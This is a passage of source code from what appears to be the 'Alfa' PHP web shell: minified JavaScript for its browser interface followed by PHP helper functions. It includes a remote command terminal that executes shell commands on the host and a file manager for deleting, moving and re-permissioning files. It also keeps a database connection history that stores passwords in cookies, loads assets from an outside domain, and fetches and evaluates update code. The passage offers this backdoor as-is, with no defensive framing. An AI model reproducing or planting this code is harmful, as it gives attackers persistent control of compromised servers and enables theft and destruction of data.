i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+i)}});try{i.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t&&($("filesman_holder").style.minHeight="0",t=".FilesMan"),_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var i=e.getAttribute("opt_id");if($(i).remove(),-1!=$("tab_"+i).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var a=e[0].getAttribute("opt_id");null!=$(a)&&$(a).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+i+"]").remove()}function closeOption(e,t){t.stopPropagation();var i=e.getAttribute("opt_id");if($(i).remove(),-1!=$("tab_"+i).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var a=e[0].getAttribute("opt_id");null!=$(a)&&$(a).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+i+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var i=e.getAttribute("term_id");if(($(i).remove(),-1!=$("tab_"+i).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var a=e[0].getAttribute("term_id");null!=$(a)&&$(a).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+i+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var i=e.getAttribute("opt_id");if(($(i).remove(),-1!=$("tab_"+i).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var a=e[0].getAttribute("opt_id");null!=$(a)&&$(a).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+i+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var i=null;void 0===t?i=e.getAttribute("opt_id"):(i=e,e=$("tab_"+i));var a=editor_files["file_"+i.replace("editor_source_","")];if(void 0!==a&&(d.querySelector(".editor-path").innerHTML=(a.pwd+"/"+a.file).replace(/\/\//g,"/")),null==i)return!1;$(i).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var i=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=i,t.style.visibility=i>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",i="",a="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",i=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+a+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+a+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+a+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+a+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+a+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+a+'\');" term_id="'+a+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+a+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+a+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+a+'" id="tab_'+a+'" class="terminal-tab'+i+'">Terminal <img term_id="'+a+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[a]={index:0,key:-1},d.querySelector("#"+a+" .php-terminal-input").focus(),d.querySelector("#"+a+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(a),php_temrinal_using_cgi=!0;var r=alfaGetTerminalHistory();for(var o in r)d.querySelector("#"+a+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+a+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+r[o]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),i=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==i&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=i)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var i=d.querySelector("#"+e+" pre.ml1"),a=parseInt(window.getComputedStyle(i,null).getPropertyValue("font-size")),r="";1==t?(r=a+1+"px",i.style.fontSize=r):(r=a-1+"px",i.style.fontSize=r),setCookie("alfa-terminal-fontsize",r,2012)}function alfaWalkInTerminalHistory(e,t,i){var a=t||window.event;if("38"==a.keyCode||"40"==a.keyCode||"37"==a.keyCode||"39"==a.keyCode)switch(a.keyCode){case 38:var r=alfaGetTerminalHistory(!0),o="";0==terminal_walk_index[i].index?(0==terminal_walk_index[i].key&&++terminal_walk_index[i].index,void 0!==(o=r[terminal_walk_index[i].index])?(e.value=o,++terminal_walk_index[i].index):(e.value="",terminal_walk_index[i].index=0)):terminal_walk_index[i].index<r.length&&(0==terminal_walk_index[i].key&&++terminal_walk_index[i].index,e.value=r[terminal_walk_index[i].index],++terminal_walk_index[i].index),terminal_walk_index[i].key=1;break;case 40:r=alfaGetTerminalHistory(!0);if(terminal_walk_index[i].index>=0)0!=terminal_walk_index[i].index&&(--terminal_walk_index[i].index,1==terminal_walk_index[i].key&&--terminal_walk_index[i].index),void 0!==(o=r[terminal_walk_index[i].index])?e.value=o:(e.value="",terminal_walk_index[i].index=0);terminal_walk_index[i].key=0;break;default:console.log(a.keyCode)}else terminal_walk_index[i].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var i=t.getAttribute("term_id");return e=d.querySelector("#"+i+" .cmd-history-icon"),d.querySelector("#"+i+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+i+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var a=e.getAttribute("mode"),r=(i=e.getAttribute("term_id"),d.querySelector("#"+i+" .cmd-history-holder"));0==a.length||"off"==a?(r.style.visibility="visible",r.style.opacity="1",e.setAttribute("mode","on")):(r.style.visibility="hidden",r.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),i=e.getAttribute("fname"),a=e.getAttribute("base_id");if(".."==i&&"phar://"!=t.substr(0,7))return!1;var r="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(a)+"&ajax="+alfab64("true");_Ajax(d.URL,r,function(e){if("0"!=e){$("archive_base_"+a).innerHTML=e;var i=$("archive_dir_"+a).getAttribute("archive_name"),r=$("archive_dir_"+a).getAttribute("archive_full"),o="",n="";if(0!=(t=t.split(i)[1]).length){var l=(t=t.split("/")).length-1;for(var c in 0==t[l].length&&t.splice(l,1),t)0!=t.length&&(n+=t[c]+"/",o+='<a base_id="'+a+'" fname="'+t[c]+'" path="'+r+n+'" onclick="alfaOpenArchive(this);">'+t[c]+"/</a>")}d.querySelector("#archive_dir_"+a+" .archive_pwd_holder").innerHTML=o}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var i={};try{i=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}var a=d.querySelector("#"+t+" form[name=sf]");return a.sql_host.value=i[e].host,a.sql_login.value=i[e].user,a.sql_pass.value=i[e].pass,a.sql_base.value=i[e].db,a.sql_count.checked=!0,a.onsubmit(),!1}function alfaShowConnectionHistory(e){var t={},i=e.getAttribute("db_id"),a=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==a){e.setAttribute("mode","off");try{t=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}var r,o=1;for(r in t){var n=t[r].user+"_"+t[r].db;rows+='<tr class="dbh_'+n+'"><th>'+o+"</th><th>"+t[r].host+"</th><th>"+t[r].user+"</th><th>"+t[r].pass+"</th><th>"+t[r].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+n+'","'+i+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+n+"\");'>X</button></th></tr>",o++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+i+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,i={};try{i=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(i[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete i[e],setCookie("alfa_connection_hist",JSON.stringify(i),2012)}function alfaExecTerminal(e,t){var i="";if(0==(i=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==i?i="ls -trh --color":"ll"==i&&(i="ls -ltrh --color");var a=e.getAttribute("term_id");alfaloader(a,"block"),closeHistoryCmd("free",e);var r="";"FORM"==e.tagName&&(r=e.querySelector(".php-terminal-current-dir").innerHTML),0==(r=r.trim()).length&&(r=c_);var o="a="+alfab64("terminalExec")+"&c="+alfab64(r)+"&alfa1="+alfab64(i)+"&ajax="+alfab64("true");if(_Ajax(d.URL,o,function(e,t){alfaloader(t,"none");try{var i=$("tab_"+a);null!=i&&((-1==i.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(i.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",i.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,a),void 0===t){d.querySelector("#"+a+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+a+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+i+"</div>");var n=alfaGetTerminalHistory(),l=n.indexOf(i);-1!=l&&n.splice(l,1),n.push(i),setCookie("alfa-terminal-history",JSON.stringify(n),2012)}d.querySelector("#"+a+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t=getCookie("alfa_files_page_number"),i=e.innerText;if("<<"==i){t=d.querySelector(".active-page-number").innerText;if(!((t=parseInt(t))>1))return!1;i=t-1}if(">>"==i){t=d.querySelector(".active-page-number").innerText;t=parseInt(t);var a=d.querySelector(".last-page-number").innerHTML;if(!(t+1<=(a=parseInt(a))))return!1;i=t+1}setCookie("alfa_files_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),i=t.getElementsByClassName("box");for(a=0;a<i.length;a++)i[a].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var a;i=t.getElementsByClassName("sub-box");for(a=0;a<i.length;a++)i[a].setAttribute("opt_id",e),i[a].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var i=this.innerHTML,a=col_dumper_selected_data[t][e].indexOf(i);-1==a?col_dumper_selected_data[t][e].push(i):col_dumper_selected_data[t][e].splice(a,1)})}function showSymlinkPath(e,t){var i=e.getAttribute("row"),a=$("td_row_"+i),r=e.getAttribute("opt_title"),o=e.getAttribute("fname");if(r=decodeURIComponent(o)+" -> "+r,null!=a){a.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+i+'">'+r+"</div>");var n=t.clientX,l=t.clientY-30;$("link_id_"+i).style.left=n+"px",$("link_id_"+i).style.top=l+"px"}}function hideSymlinkPath(e){$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var i=t.split("=");return e[i[0]]=i[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var i="auto";isArchive(t.file)&&(i="view"),editor(t.path+"/"+t.file,i,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,i="";if(".."==(i="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var a=t.getAttribute("id"),r=t.getAttribute("path"),o=t.getAttribute("ftype"),n=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var l in"file"!=o||isArchive(i)?n[3]="view_archive":n.splice(11,1),"folder"==o&&(n=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(n),n){var c=d.querySelector("#rightclick_menu > a[name="+n[l]+"]");switch(c.setAttribute("fid",a),c.setAttribute("fname",decodeURIComponent(i)),c.setAttribute("path",r),c.setAttribute("ftype",o),n[l]){case"view":case"edit":var s="auto";"edit"==n[l]&&(s="edit"),c.setAttribute("href","#action=fileman&path="+c_+"/&file="+i),c.setAttribute("onclick","editor('"+i+"','"+s+"','','','','file')");break;case"newtab":var u=i;"file"==o&&(u="&file="+i),c.setAttribute("href","#action=fileman&path="+c_+"/"+u);break;case"delete":c.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+i+" # ?'); chk ? g('FilesMan',null,'delete', '"+i+"') : '';");break;case"download":c.setAttribute("onclick","g('FilesTools',null,'"+i+"', 'download')");break;case"permission":try{var f=d.querySelector("#id_chmode_"+a.replace("id_","")+" span").innerHTML;c.setAttribute("perm",f.trim())}catch(e){}break;case"link":c.style.display="block";var m="<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>/",h=(c_+"/"+i).replace(/\/\//g,"/");if(-1!=h.indexOf(m)){m=h.replace(m,"");var p=location.origin+"/"+m;c.setAttribute("href",""+p)}else c.style.display="none"}}var _=e.clientX,b=e.clientY;alfaRightClickMenu(_,b),e.preventDefault()})})}function alfaPopupAction(e,t){var i="",a="";switch(t){case"rename":i="Old file name:",a="New file name:";break;case"copy":i="File path:",a="Enter the file path that you want to copy this file to:";break;case"move":i="Current Path:",a="Enter the file path that you want to move this file to:";break;case"extract":i="Files to extract:",a="Enter the path you wish to extract the files to and click Extract:"}var r=e.getAttribute("fname"),o=e.getAttribute("path"),n=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",n="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var l=e.getAttribute("perm"),c=l.substr(1,1),s=l.substr(2,1),u=l.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(c,"u",["u","g","w"]),autoCheckPerms(s,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var f="move"==t||"copy"==t?o+r:r;if("modify"==t){var m="tr_row_"+e.getAttribute("fid").replace("id_","");f=d.querySelector("#"+m+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=n,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=n,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o+r,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=f,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,i){if(void 0!==i)for(var a in i){var r=i[a];d.querySelector("#shortcutMenu-holder > form input[name="+r+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+r+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+r+"x]").checked=!1}var o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),l=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(o.checked=!0,n.checked=!0,l.checked=!0):"4"==e?o.checked=!0:"2"==e?n.checked=!0:"1"==e?l.checked=!0:"6"==e?(o.checked=!0,n.checked=!0):"3"==e?(n.checked=!0,l.checked=!0):"5"==e&&(o.checked=!0,l.checked=!0);else{var c=0;o.checked&&(c+=4),n.checked&&(c+=2),l.checked&&(c+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=c:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=c)}}function gg(e,t,i,a,r,o){alfaloader("filesman_holder","block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(i)+"&alfa2="+alfab64(a)+"&alfa3="+alfab64(r)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,o,!1,".FilesMan")}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var i=e.getAttribute("fid").replace("id_",""),a=$("id_"+i).getAttribute("fname"),r=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;r=r.trim(),a=a.trim(),gg("doActions",c_,a,r,t,function(e){if("rename"==t)if("done"==e){var a=$("id_"+i);updateFileEditor(i,r);var o=a.getAttribute("path")+$("id_"+i).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,a.addEventListener("animationend",function(){a.classList.remove("textEffect")}),a.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader("filesman_holder","none")});break;case"permission":var o=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,l=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;a=(a=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var c=o.trim()+n.trim()+l.trim();gg("doActions",c_,a,c,t,function(e){alfaloader("filesman_holder","none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":i=e.getAttribute("fid").replace("id_","");var s=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+i).getAttribute("fname");gg("doActions",c_,s,u,t,function(t){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=s,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader("filesman_holder","none")})}}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var i=0;t==editor_current_file&&(i=" is_active"),insertToHistory(t,editor_files[t].file,i,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length){d.body.insertAdjacentHTML("beforeend",e);try{evalJS(e)}catch(e){}}}),<?php echo $GLOBALS["need_to_update_header"]; ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var i in t){for(var a="",r=0;r<t[i].length;r++)a+="useful"==i||"downloader"==i?'<span class="header_values" style="margin-left: 4px;">'+t[i][r]+"</span>":t[i][r];var o=$("header_"+i);o&&(o.innerHTML=a)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501),d.querySelectorAll(".menu_options").forEach(function(e){e.addEventListener("contextmenu",function(e){d.querySelector("#rightclick_menu > a[name=newtab]").setAttribute("href",e.target.getAttribute("href"));var t=e.clientX,i=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(t,i),e.preventDefault()})})},!1);
3375</script>
3376<?php echo "</body>
3377</html>
3378";
3379}}
3380if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
3381function posix_getpwuid($p) {return false;} }
3382if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
3383function posix_getgrgid($p) {return false;} }
3384function alfaWhich($p) {
3385$path = alfaEx('which ' . $p,false,false);
3386if(!empty($path))
3387return strlen($path);
3388return false;
3389}
3390function alfaSize($s) {
3391if($s >= 1073741824)
3392return sprintf('%1.2f', $s / 1073741824 ). ' GB';
3393elseif($s >= 1048576)
3394return sprintf('%1.2f', $s / 1048576 ) . ' MB';
3395elseif($s >= 1024)
3396return sprintf('%1.2f', $s / 1024 ) . ' KB';
3397else
3398return $s . ' B';
3399}
3400function alfaPerms($p) {
3401if (($p & 0xC000) == 0xC000)$i = 's';
3402elseif (($p & 0xA000) == 0xA000)$i = 'l';
3403elseif (($p & 0x8000) == 0x8000)$i = '-';
3404elseif (($p & 0x6000) == 0x6000)$i = 'b';
3405elseif (($p & 0x4000) == 0x4000)$i = 'd';
3406elseif (($p & 0x2000) == 0x2000)$i = 'c';
3407elseif (($p & 0x1000) == 0x1000)$i = 'p';
3408else $i = 'u';
3409$i .= (($p & 0x0100) ? 'r' : '-');
3410$i .= (($p & 0x0080) ? 'w' : '-');
3411$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
3412$i .= (($p & 0x0020) ? 'r' : '-');
3413$i .= (($p & 0x0010) ? 'w' : '-');
3414$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
